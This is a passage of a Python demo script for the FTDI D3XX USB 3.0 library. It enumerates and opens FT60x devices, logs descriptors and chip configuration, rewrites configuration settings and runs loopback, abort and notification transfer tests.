%#010X" % DEVICE['ID']) logging.debug("\tLocId = %d" % DEVICE['LocId']) logging.debug("\tSerialNumber = %s" % DEVICE['SerialNumber'].decode('utf-8')) logging.debug("\tDescription = %s" % DEVICE['Description'].decode('utf-8')) DEVICE = 0 logging.debug("") return True def DemoOpenDeviceBy(): if sys.platform == 'linux': DemoTurnOffPipeThreads() # get description and serial number of device at index 0 ftd3xx.createDeviceInfoList() DEVICELIST = ftd3xx.getDeviceInfoList() # open device by index openby = 0 logging.debug("Open by index [%d]" % openby) D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if (D3XX is None): logging.debug("ERROR: Please check if another D3XX application is open!") return False D3XX.close() D3XX = 
0 # open device by description if sys.platform == 'linux': DemoTurnOffPipeThreads() ftd3xx.createDeviceInfoList() DEVICELIST = ftd3xx.getDeviceInfoList() openby = DEVICELIST[0].Description logging.debug("Open by description [%s]" % openby.decode('utf-8')) D3XX = ftd3xx.create(openby, _ft.FT_OPEN_BY_DESCRIPTION) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False D3XX.close() D3XX = 0 # open device by serial number if sys.platform == 'linux': DemoTurnOffPipeThreads() ftd3xx.createDeviceInfoList() DEVICELIST = ftd3xx.getDeviceInfoList() openby = DEVICELIST[0].SerialNumber logging.debug("Open by serial number [%s]" % openby.decode('utf-8')) D3XX = ftd3xx.create(openby, _ft.FT_OPEN_BY_SERIAL_NUMBER) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False D3XX.close() D3XX = 0 return True def DemoVersions(): if sys.platform == 'linux': DemoTurnOffPipeThreads() D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False # getLibraryVersion ulLibraryVersion = D3XX.getLibraryVersion() logging.debug("LibraryVersion = %#08X" % ulLibraryVersion) # getDriverVersion ulDriverVersion = D3XX.getDriverVersion() logging.debug("DriverVersion = %#08X" % ulDriverVersion) # getFirmwareVersion ulFirmwareVersion = D3XX.getFirmwareVersion() logging.debug("FirmwareVersion = %#08X" % ulFirmwareVersion) D3XX.close() D3XX = 0 # check driver version if (sys.platform == 'win32'): if (ulDriverVersion < 0x01020006): logging.debug("ERROR: Old kernel driver version. 
Please update driver from Windows Update or FTDI website!") return False return True def DemoDescriptors(): if sys.platform == 'linux': DemoTurnOffPipeThreads() D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX) if D3XX is None: logging.debug("ERROR: Please check if another D3XX application is open!") return False # getVIDPID VID, PID = D3XX.getVIDPID() logging.debug("VID = %#04X" % VID) logging.debug("PID = %#04X" % PID) logging.debug("") if sys.platform == 'win32': # getDeviceInfo DEVINFO = D3XX.getDeviceInfo() logging.debug("Type = %d" % DEVINFO['Type']) logging.debug("ID = %#08X" % DEVINFO['ID']) logging.debug("Serial = %s" % DEVINFO['Serial'].decode('utf-8')) logging.debug("Description = %s" % DEVINFO['Description'].decode('utf-8')) logging.debug("") # getDeviceDescriptor DEVDESC = D3XX.getDeviceDescriptor() STRDESCMANU = D3XX.getStringDescriptor(DEVDESC.iManufacturer) STRDESCPROD = D3XX.getStringDescriptor(DEVDESC.iProduct) STRDESCSERN = D3XX.getStringDescriptor(DEVDESC.iSerialNumber) logging.debug("Device Descriptor") logging.debug("\tbLength = %d" % DEVDESC.bLength) logging.debug("\tbDescriptorType = %d" % DEVDESC.bDescriptorType) logging.debug("\tbcdUSB = %#04X (%s)" % (DEVDESC.bcdUSB, "USB2" if (DEVDESC.bcdUSB < 0x300) else "USB3")) logging.debug("\tbDeviceClass = %#02X" % DEVDESC.bDeviceClass) logging.debug("\tbDeviceSubClass = %#02X" % DEVDESC.bDeviceSubClass) logging.debug("\tbDeviceProtocol = %#02X" % DEVDESC.bDeviceProtocol) logging.debug("\tbMaxPacketSize0 = %#02X (%d)" % (DEVDESC.bMaxPacketSize0, DEVDESC.bMaxPacketSize0)) logging.debug("\tidVendor = %#04X" % DEVDESC.idVendor) logging.debug("\tidProduct = %#04X" % DEVDESC.idProduct) logging.debug("\tbcdDevice = %#04X" % DEVDESC.bcdDevice) if sys.platform == 'win32': logging.debug("\tiManufacturer = %#02X (%s)" % (DEVDESC.iManufacturer, str(STRDESCMANU.szString))) logging.debug("\tiProduct = %#02X (%s)" % (DEVDESC.iProduct, str(STRDESCPROD.szString))) logging.debug("\tiSerialNumber = %#02X (%s)" % 
(DEVDESC.iSerialNumber, str(STRDESCSERN.szString))) else: logging.debug("\tiManufacturer = %#02X" % (DEVDESC.iManufacturer)) logging.debug("\tiProduct = %#02X" % (DEVDESC.iProduct)) logging.debug("\tiSerialNumber = %#02X" % (DEVDESC.iSerialNumber)) logging.debug("\tbNumConfigurations = %#02X" % DEVDESC.bNumConfigurations) logging.debug("") # getConfigurationDescriptor CFGDESC = D3XX.getConfigurationDescriptor() logging.debug("Configuration Descriptor") logging.debug("\tbLength = %d" % CFGDESC.bLength) logging.debug("\tbDescriptorType = %d" % CFGDESC.bDescriptorType) logging.debug("\twTotalLength = %#04X (%d)" % (CFGDESC.wTotalLength, CFGDESC.wTotalLength)) logging.debug("\tbNumInterfaces = %#02X" % CFGDESC.bNumInterfaces) logging.debug("\tbConfigurationValue = %#02X" % CFGDESC.bConfigurationValue) logging.debug("\tiConfiguration = %#02X" % CFGDESC.iConfiguration) bSelfPowered = "Self-powered" if (CFGDESC.bmAttributes & _ft.FT_SELF_POWERED_MASK) else "Bus-powered" bRemoteWakeup = "Remote wakeup" if (CFGDESC.bmAttributes & _ft.FT_REMOTE_WAKEUP_MASK) else "" logging.debug("\tbmAttributes = %#02X (%s %s)" % (CFGDESC.bmAttributes, bSelfPowered, bRemoteWakeup)) logging.debug("\tMaxPower = %#02X (%d mA)" % (CFGDESC.MaxPower, CFGDESC.MaxPower)) logging.debug("") # getInterfaceDescriptor # getPipeInformation for i in range(CFGDESC.bNumInterfaces): IFDESC = D3XX.getInterfaceDescriptor(i) logging.debug("\tInterface Descriptor [%d]" % i) logging.debug("\t\tbLength = %d" % IFDESC.bLength) logging.debug("\t\tbDescriptorType = %d" % IFDESC.bDescriptorType) logging.debug("\t\tbInterfaceNumber = %#02X" % IFDESC.bInterfaceNumber) logging.debug("\t\tbAlternateSetting = %#02X" % IFDESC.bAlternateSetting) logging.debug("\t\tbNumEndpoints = %#02X" % IFDESC.bNumEndpoints) logging.debug("\t\tbInterfaceClass = %#02X" % IFDESC.bInterfaceClass) logging.debug("\t\tbInterfaceSubClass = %#02X" % IFDESC.bInterfaceSubClass) logging.debug("\t\tbInterfaceProtocol = %#02X" % 
IFDESC.bInterfaceProtocol) logging.debug("\t\tiInterface = %#02X" % IFDESC.iInterface) logging.debug("") for j in range(IFDESC.bNumEndpoints): PIPEIF = D3XX.getPipeInformation(i, j) logging.debug("\t\tPipe Information [%d]" % j) logging.debug("\t\t\tPipeType = %d" % PIPEIF.PipeType) logging.debug("\t\t\tPipeId = %#02X" % PIPEIF.PipeId) logging.debug("\t\t\tMaximumPacketSize = %#02X" % PIPEIF.MaximumPacketSize) logging.debug("\t\t\tInterval = %#02X" % PIPEIF.Interval) logging.debug("") D3XX.close() D3XX = 0 return True def GetInfoFromStringDescriptor(stringDescriptor): desc = bytearray(stringDescriptor) len = int(desc[0]) Manufacturer = "" for i in range(2, len, 2): Manufacturer += "{0:c}".format(desc[i]) desc = desc[len:] len = desc[0] ProductDescription = "" for i in range(2, len, 2): ProductDescription += "{0:c}".format(desc[i]) desc = desc[len:] len = desc[0] SerialNumber = "" for i in range(2, len, 2): SerialNumber += "{0:c}".format(desc[i]) desc = desc[len:] return {'Manufacturer': Manufacturer, 'ProductDescription': ProductDescription, 'SerialNumber': SerialNumber} def SetInfoForStringDescriptor(cfg, manufacturer, productDescription, serialNumber): # verify length of strings if (len(manufacturer) >= _ft.FT_MAX_MANUFACTURER_SIZE): return False if (len(productDescription) >= _ft.FT_MAX_DESCRIPTION_SIZE): return False if (len(serialNumber) >= _ft.FT_MAX_SERIAL_NUMBER_SIZE): return False # convert strings to bytearrays manufacturer = bytearray(manufacturer, 'utf-8') productDescription = bytearray(productDescription, 'utf-8') serialNumber = bytearray(serialNumber, 'utf-8') ctypes.memset(cfg.StringDescriptors, 0, 128) desc = cfg.StringDescriptors # copy manufacturer offset = 0 desc[offset] = len(manufacturer)*2 + 2 desc[offset + 1] = 0x3 offset += 2 for i in range (0, len(manufacturer)): desc[int(offset + (i*2))] = manufacturer[i] desc[int(offset + (i*2)+1)] = 0x0 # copy product description offset += len(manufacturer)*2 desc[offset] = len(productDescription)*2 + 2 
desc[offset + 1] = 0x3 offset += 2 for i in range (0, len(productDescription)): desc[int(offset + (i*2))] = productDescription[i] desc[int(offset + (i*2)+1)] = 0x0 # copy serial number offset += len(productDescription)*2 desc[offset] = len(serialNumber)*2 + 2 desc[offset + 1] = 0x3 offset += 2 for i in range (0, len(serialNumber)): desc[int(offset + (i*2))] = serialNumber[i] desc[int(offset + (i*2)+1)] = 0x0 #for e in desc: print "%x" % e return True def DisplayChipConfiguration(cfg): logging.debug("Chip Configuration:") logging.debug("\tVendorID = %#06x" % cfg.VendorID) logging.debug("\tProductID = %#06x" % cfg.ProductID) logging.debug("\tStringDescriptors") STRDESC = GetInfoFromStringDescriptor(cfg.StringDescriptors) logging.debug("\t\tManufacturer = %s" % STRDESC['Manufacturer']) logging.debug("\t\tProductDescription = %s" % STRDESC['ProductDescription']) logging.debug("\t\tSerialNumber = %s" % STRDESC['SerialNumber']) logging.debug("\tInterruptInterval = %#04x" % cfg.bInterval) bSelfPowered = "Self-powered" if (cfg.PowerAttributes & _ft.FT_SELF_POWERED_MASK) else "Bus-powered" bRemoteWakeup = "Remote wakeup" if (cfg.PowerAttributes & _ft.FT_REMOTE_WAKEUP_MASK) else "" logging.debug("\tPowerAttributes = %#04x (%s %s)" % (cfg.PowerAttributes, bSelfPowered, bRemoteWakeup)) logging.debug("\tPowerConsumption = %#04x" % cfg.PowerConsumption) logging.debug("\tReserved2 = %#04x" % cfg.Reserved2) fifoClock = ["100 MHz", "66 MHz", "50 MHz", "40 MHz"] logging.debug("\tFIFOClock = %#04x (%s)" % (cfg.FIFOClock, fifoClock[cfg.FIFOClock])) fifoMode = ["245 Mode", "600 Mode"] logging.debug("\tFIFOMode = %#04x (%s)" % (cfg.FIFOMode, fifoMode[cfg.FIFOMode])) channelConfig = ["4 Channels", "2 Channels", "1 Channel", "1 OUT Pipe", "1 IN Pipe"] logging.debug("\tChannelConfig = %#04x (%s)" % (cfg.ChannelConfig, channelConfig[cfg.ChannelConfig])) logging.debug("\tOptionalFeatureSupport = %#06x" % cfg.OptionalFeatureSupport) logging.debug("\t\tBatteryChargingEnabled : %d" % 
                  # continuation of the OptionalFeatureSupport dump started on the previous source line
                  ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLEBATTERYCHARGING) >> 0) )
    logging.debug("\t\tDisableCancelOnUnderrun : %d" %
                  ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_DISABLECANCELSESSIONUNDERRUN) >> 1) )
    # one notification-enable bit per IN channel (bits 2..5)
    logging.debug("\t\tNotificationEnabled : %d %d %d %d" %
                  (((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH1) >> 2),
                   ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH2) >> 3),
                   ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH3) >> 4),
                   ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH4) >> 5) ))
    # one underrun-disable bit per IN channel (bits 6..9)
    logging.debug("\t\tUnderrunEnabled : %d %d %d %d" %
                  (((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_DISABLEUNDERRUN_INCH1) >> 6),
                   ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_DISABLEUNDERRUN_INCH2) >> 7),
                   ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_DISABLEUNDERRUN_INCH3) >> 8),
                   ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_DISABLEUNDERRUN_INCH4) >> 9) ))
    logging.debug("\t\tEnableFifoInSuspend : %d" %
                  ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_SUPPORT_ENABLE_FIFO_IN_SUSPEND) >> 10) )
    logging.debug("\t\tDisableChipPowerdown : %d" %
                  ((cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_SUPPORT_DISABLE_CHIP_POWERDOWN) >> 11) )
    logging.debug("\tBatteryChargingGPIOConfig = %#02x" % cfg.BatteryChargingGPIOConfig)
    logging.debug("\tFlashEEPROMDetection = %#02x (read-only)" % cfg.FlashEEPROMDetection)
    logging.debug("\t\tCustom Config Validity : %s" %
                  ("Invalid" if (cfg.FlashEEPROMDetection & (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_CUSTOMDATA_INVALID)) else "Valid") )
    logging.debug("\t\tCustom Config Checksum : %s" %
                  ("Invalid" if (cfg.FlashEEPROMDetection &
                                 (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_CUSTOMDATACHKSUM_INVALID)) else "Valid") )
    logging.debug("\t\tGPIO Input : %s" %
                  ("Used" if (cfg.FlashEEPROMDetection & (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_GPIO_INPUT)) else "Ignore") )
    # GPIO levels are only meaningful when the GPIO-input bit is set
    if (cfg.FlashEEPROMDetection & (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_GPIO_INPUT)):
        logging.debug("\t\tGPIO 0 : %s" %
                      ("High" if (cfg.FlashEEPROMDetection & (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_GPIO_0)) else "Low") )
        logging.debug("\t\tGPIO 1 : %s" %
                      ("High" if (cfg.FlashEEPROMDetection & (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_GPIO_1)) else "Low") )
    logging.debug("\t\tConfig Used : %s" %
                  ("Custom" if (cfg.FlashEEPROMDetection & (1<<_ft.FT_CONFIGURATION_FLASH_ROM_BIT_CUSTOM)) else "Default") )
    logging.debug("\tMSIO_Control = %#010x" % cfg.MSIO_Control)
    logging.debug("\tGPIO_Control = %#010x" % cfg.GPIO_Control)
    logging.debug("")

def DemoGetChipConfiguration(bDisplay=True):
    """Open device 0, log its current chip configuration, close it.

    Returns True on success, False if the device cannot be opened.
    bDisplay is accepted for symmetry with the other demos but is not
    used in this function.
    """
    if sys.platform == 'linux':
        DemoTurnOffPipeThreads()
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    # get and display current chip configuration
    logging.debug("get current chip configuration")
    cfg = D3XX.getChipConfiguration()
    DisplayChipConfiguration(cfg)
    D3XX.close()
    D3XX = 0
    return True

def DemoResetChipConfiguration(bDisplay=True):
    """Write a known-good default configuration to device 0.

    The device re-enumerates after setChipConfiguration(); when bDisplay
    is True the device is reopened afterwards and the new configuration
    is logged. Returns True on success, False if the open fails.
    """
    if bDisplay == True:
        logging.debug("reset chip configuration")
    if sys.platform == 'linux':
        DemoTurnOffPipeThreads()
    # set default chip configuration
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    # Hack: Reset it to some decent config..
    cfg = D3XX.getChipConfiguration()
    # hard-coded "decent" defaults for this demo setup
    cfg.ProductID = 0x601e
    cfg.bInterval = 0x09
    cfg.PowerAttributes = 0xe0
    cfg.PowerConsumption = 0x60
    cfg.Reserved2 = 0x00
    cfg.FIFOClock = _ft.FT_CONFIGURATION_FIFO_CLK_100
    # cfg.FIFOClock = _ft.FT_CONFIGURATION_FIFO_CLK_66
    # cfg.FIFOClock = _ft.FT_CONFIGURATION_FIFO_CLK_50
    # cfg.FIFOClock = _ft.FT_CONFIGURATION_FIFO_CLK_40
    cfg.FIFOMode = _ft.FT_CONFIGURATION_FIFO_MODE_245
    cfg.ChannelConfig = _ft.FT_CONFIGURATION_CHANNEL_CONFIG_1
    cfg.OptionalFeatureSupport = 0x03c2
    cfg.BatteryChargingGPIOConfig = 0xe4
    cfg.MSIO_Control = 0x00010800
    D3XX.setChipConfiguration(cfg)
    D3XX.close(True)
    D3XX = 0
    # wait until device has reenumerated
    DemoWaitForDeviceReenumeration()
    # reopen to display chip configuration
    if bDisplay == True:
        if sys.platform == 'linux':
            DemoTurnOffPipeThreads()
        D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
        if D3XX is None:
            logging.debug("ERROR: Please check if another D3XX application is open!")
            return False
        cfg = D3XX.getChipConfiguration()
        DisplayChipConfiguration(cfg)
        D3XX.close()
        D3XX = 0
    return True

def DemoModifyChipConfiguration():
    """Overwrite the device's string descriptors and verify by rereading.

    Returns True on success, False if the device cannot be opened.
    """
    if sys.platform == 'linux':
        DemoTurnOffPipeThreads()
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    # get and display current chip configuration
    logging.debug("get and modify current chip configuration")
    cfg = D3XX.getChipConfiguration()
    DisplayChipConfiguration(cfg)
    # modify chip configuration
    Manufacturer = "ManufacturerMod"
    ProductDescription = "ProductDescriptionMod"
    SerialNumber = "SerialNumberMod"
    newCfg = cfg  # NOTE(review): alias, not a copy -- cfg and newCfg are the same object
    SetInfoForStringDescriptor(newCfg, Manufacturer, ProductDescription, SerialNumber)
    D3XX.setChipConfiguration(newCfg)
    D3XX.close(True)
    D3XX = 0
    # wait until device has reenumerated
    DemoWaitForDeviceReenumeration()
    # reopen to display current chip configuration
    logging.debug("get new chip configuration")
    if sys.platform == 'linux':
        DemoTurnOffPipeThreads()
    D3XX = ftd3xx.create(0,
                         _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    readCfg = D3XX.getChipConfiguration()
    DisplayChipConfiguration(readCfg)
    # NOTE(review): STRDESC is computed but never used
    STRDESC = GetInfoFromStringDescriptor(readCfg.StringDescriptors)
    D3XX.close()
    D3XX = 0
    return True

def DemoSetChipConfiguration():
    """Build an FT_60XCONFIGURATION from scratch (library defaults) and
    write it to the device, then reread and log it.

    Returns True on success, False if the device cannot be opened.
    """
    if sys.platform == 'linux':
        DemoTurnOffPipeThreads()
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    # set chip configuration without using getChipConfiguration()
    logging.debug("set chip configuration without using getChipConfiguration")
    cfg = _ft.FT_60XCONFIGURATION()
    Manufacturer = "ManufacturerSet"
    ProductDescription = "ProductDescriptionSet"
    SerialNumber = "SerialNumberSet"
    SetInfoForStringDescriptor(cfg, Manufacturer, ProductDescription, SerialNumber)
    cfg.VendorID = _ft.FT_CONFIGURATION_DEFAULT_VENDORID
    cfg.ProductID = _ft.FT_CONFIGURATION_DEFAULT_PRODUCTID_601
    cfg.bInterval = _ft.FT_CONFIGURATION_DEFAULT_INTERRUPT_INTERVAL
    cfg.PowerAttributes = _ft.FT_CONFIGURATION_DEFAULT_POWERATTRIBUTES
    cfg.PowerConsumption = _ft.FT_CONFIGURATION_DEFAULT_POWERCONSUMPTION
    cfg.Reserved2 = 0
    cfg.FIFOClock = _ft.FT_CONFIGURATION_DEFAULT_FIFOCLOCK
    cfg.FIFOMode = _ft.FT_CONFIGURATION_DEFAULT_FIFOMODE
    cfg.ChannelConfig = _ft.FT_CONFIGURATION_DEFAULT_CHANNELCONFIG
    cfg.OptionalFeatureSupport = _ft.FT_CONFIGURATION_DEFAULT_OPTIONALFEATURE
    cfg.BatteryChargingGPIOConfig = _ft.FT_CONFIGURATION_DEFAULT_BATTERYCHARGING
    cfg.FlashEEPROMDetection = _ft.FT_CONFIGURATION_DEFAULT_FLASHDETECTION
    cfg.MSIO_Control = _ft.FT_CONFIGURATION_DEFAULT_MSIOCONTROL
    cfg.GPIO_Control = _ft.FT_CONFIGURATION_DEFAULT_GPIOCONTROL
    DisplayChipConfiguration(cfg)
    D3XX.setChipConfiguration(cfg)
    D3XX.close(True)
    D3XX = 0
    # wait until device has reenumerated
    DemoWaitForDeviceReenumeration()
    # reopen to display current chip configuration
    logging.debug("get new chip configuration")
    if sys.platform == 'linux':
        DemoTurnOffPipeThreads()
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    readCfg = D3XX.getChipConfiguration()
    DisplayChipConfiguration(readCfg)
    D3XX.close()
    D3XX = 0
    return True

def DemoChipConfiguration():
    """Chip-configuration test driver; only the reset path is active."""
    # result = DemoGetChipConfiguration()
    # if result == True:
    # result = DemoSetChipConfiguration()
    # if result == True:
    # result = DemoResetChipConfiguration()
    # if result == True:
    # result = DemoGetChipConfiguration()
    # if result == True:
    # result = DemoModifyChipConfiguration()
    # if result == True:
    result = DemoResetChipConfiguration()
    # if result == True:
    # result = DemoGetChipConfiguration()
    return result

def DemoTransfer():
    """Run the transfer demos appropriate for the current platform.

    NOTE(review): on platforms other than win32/linux (e.g. darwin)
    'result' is never assigned and the return raises NameError.
    """
    if sys.platform == 'win32':
        # abort transfer test
        result = DemoAbortTransfer()
        # loopback in streaming and non-streaming mode
        if result == True:
            result = DemoLoopback(True)
        if result == True:
            result = DemoLoopback(False)
    elif sys.platform == 'linux':
        result = DemoLoopback()
    return result

def DemoLoopback(bStreamingMode=False):
    """Write random data to the OUT pipe and read it back from the IN pipe,
    comparing ten 4 KiB rounds. Returns True when every round matches.
    """
    result = True
    channel = 0
    # on linux the wrapper addresses pipes by channel index; on windows
    # raw endpoint addresses are used (0x02 OUT, 0x82 IN)
    if sys.platform == 'linux':
        epout = channel
        epin = channel
    else:
        epout = 0x02 + channel
        epin = 0x82 + channel
    size = 4096
    logging.debug("Write/read synchronous loopback of string")
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    # enable streaming mode
    if bStreamingMode and sys.platform == 'linux':
        D3XX.setStreamPipe(epout, size)
        D3XX.setStreamPipe(epin, size)
    # if python 2.7.12
    if sys.version_info.major == 2:
        for x in range(0, 10):
            buffwrite = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(size))
            bytesWritten = D3XX.writePipe(epout, buffwrite, size)
            bytesRead = 0
            buffread = ""
            while (bytesRead < bytesWritten):
                output = D3XX.readPipeEx(epin, bytesWritten - bytesRead)
                bytesRead += output['bytesTransferred']
                buffread += output['bytes']
            # compare data
            compare = True
            if (buffread[:bytesRead] != buffwrite[:bytesWritten]):
                compare = False
            logging.debug("[%d] writePipe [%d] bytes, readPipe [%d] bytes, compare = %s" %
                (x, bytesWritten, bytesRead, compare))
            if compare == False:
                result = False
                break
    # elif python 3.5.2
    # version 3 does not support implicit bytes to string conversion
    elif sys.version_info.major == 3:
        # flush old crap out first
        D3XX.readPipeEx(epin, size, raw=True, timeout=0)
        for x in range(0, 10):
            buffwrite = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(size))
            # text4k = '0123456789ABCDEF' * (4096 // 16)
            # buffwrite = ('<START %02d>' % x) + text4k[:-29] + '<qwerty_END_asdfgh>'
            # buffwrite = (chr(ord('A') + x) * 10) + text4k[:-20] + (chr(ord('a') + x) * 10)
            # buffwrite = (chr(ord('A') + x) * 10) + text4k[:-20] + (chr(ord('a') + x) * 10)
            buffwrite = buffwrite.encode('latin1')
            bytesWritten = D3XX.writePipe(epout, buffwrite, size)
            bytesRead = 0
            buffread = bytes()
            while (bytesRead < bytesWritten):
                output = D3XX.readPipeEx(epin, bytesWritten - bytesRead, raw=True, timeout=0)
                bytesRead += output['bytesTransferred']
                buffread += output['bytes']
            # compare data
            compare = True
            logging.debug(buffwrite[:bytesWritten])
            logging.debug(buffread[:bytesRead])
            if (buffread[:bytesRead] != buffwrite[:bytesWritten]):
                compare = False
            logging.debug("[%d] writePipe [%d] bytes, readPipe [%d] bytes, compare = %s" %
                (x, bytesWritten, bytesRead, compare))
            if compare == False:
                result = False
                break
    # disable streaming mode
    if bStreamingMode and sys.platform == 'linux':
        D3XX.clearStreamPipe(epout)
        D3XX.clearStreamPipe(epin)
    D3XX.close()
    D3XX = 0
    logging.debug("")
    return result

def DemoAbortThread(arg):
    """Background helper: after 1 s, abort pipe 0x82 on the given device."""
    logging.debug("DemoAbortThread\n")
    time.sleep(1)
    logging.debug("abortPipe")
    arg.abortPipe(0x82)
    return True

def DemoAbortTransfer():
    """Start a blocking read and have a background thread abort it."""
    logging.debug("Abort transfer")
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    thread = threading.Thread(target = DemoAbortThread, args = (D3XX, ))
    thread.start()
    # readpipe is blocking when overlapped parameter is not set
    # it will be unblocked by the thread DemoAbortThread
    logging.debug("readPipe")
    D3XX.setPipeTimeout(0x82, 0)
    D3XX.readPipeEx(0x82, 1024)
    thread.join()
    D3XX.close()
    D3XX = 0
    logging.debug("")
    return True

def EnableNotificationFeature(bEnable):
    """Toggle the channel-1 notification-message feature bit in the chip
    configuration and verify it after the device re-enumerates.

    Returns True on success; False if the open fails or, when enabling,
    the bit did not stick.
    """
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    # get and display current chip configuration
    cfg = D3XX.getChipConfiguration()
    #DisplayChipConfiguration(cfg)
    # enable or disable notification for 1st channel
    if bEnable:
        cfg.OptionalFeatureSupport |= _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH1;
        # NOTE(review): other code sets cfg.bInterval -- confirm 'Interval' is the intended field
        cfg.Interval = _ft.FT_CONFIGURATION_DEFAULT_INTERRUPT_INTERVAL;
    else:
        cfg.OptionalFeatureSupport &= ~_ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH1;
    #DisplayChipConfiguration(cfg)
    D3XX.setChipConfiguration(cfg)
    D3XX.close()
    D3XX = 0
    # wait until device has reenumerated
    DemoWaitForDeviceReenumeration()
    # display the chip configuration
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    cfg = D3XX.getChipConfiguration()
    DisplayChipConfiguration(cfg)
    D3XX.close()
    D3XX = 0
    if bEnable and not (cfg.OptionalFeatureSupport & _ft.FT_CONFIGURATION_OPTIONAL_FEATURE_ENABLENOTIFICATIONMESSAGE_INCH1):
        return False
    return True

def DemoNotificationTransfer():
    """Loopback transfer driven by the notification-callback mechanism."""
    logging.debug("enable notification feature on channel 1")
    EnableNotificationFeature(True)
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    D3XX.setSuspendTimeout(0)
    logging.debug("Set notification event")
    # the Event object doubles as the callback payload carrier
    eventCondition = threading.Event()
    eventCondition.ulRecvNotificationLength = int(0x0)
    eventCondition.ucEndpointNo = int(0x0)
    D3XX.setNotificationCallback(eventCondition)
    buffwrite = bytearray(4096)
    logging.debug("writePipe %d" % len(buffwrite))
    buffwrite[:] = itertools.repeat(0xAA, len(buffwrite))
    #print binascii.hexlify(buffwrite)
    # NOTE(review): str(bytearray) is a py2 idiom; on py3 it yields the repr
    bytesWritten = D3XX.writePipe(0x02, str(buffwrite), len(buffwrite))
    bytesRead = 0
    while (bytesRead < bytesWritten):
        # block until the notification callback sets the event
        while not eventCondition.is_set():
            eventCondition.wait(1)
        ulRecvNotificationLength = eventCondition.ulRecvNotificationLength
        ucEndpointNo = eventCondition.ucEndpointNo
        #print "ulRecvNotificationLength %d ucEndpointNo %d" % (ulRecvNotificationLength, ucEndpointNo)
        #readOutput = D3XX.readPipe(ucEndpointNo, ulRecvNotificationLength)
        readOutput = D3XX.readPipe(0x82, 512)
        bytesRead += readOutput['bytesTransferred']
        logging.debug("readPipe %d" % bytesRead)
        buffread = readOutput['bytes']
    logging.debug("clearNotificationCallback")
    D3XX.clearNotificationCallback()
    D3XX.close()
    D3XX = 0
    logging.debug("")
    logging.debug("disable notification feature on channel 1")
    EnableNotificationFeature(False)
    return True

def DemoPipeTimeout():
    """Get/set/verify/restore the timeout of pipe 0x02 (windows only).

    Returns True on success (or trivially on linux, where the API is
    not exercised), False on open failure or verification mismatch.
    """
    if sys.platform == 'linux':
        return True
    logging.debug("Get set pipe timeout")
    D3XX = ftd3xx.create(0, _ft.FT_OPEN_BY_INDEX)
    if D3XX is None:
        logging.debug("ERROR: Please check if another D3XX application is open!")
        return False
    pipe = 0x02
    # get timeout for pipe 0x02
    timeoutMS = D3XX.getPipeTimeout(pipe)
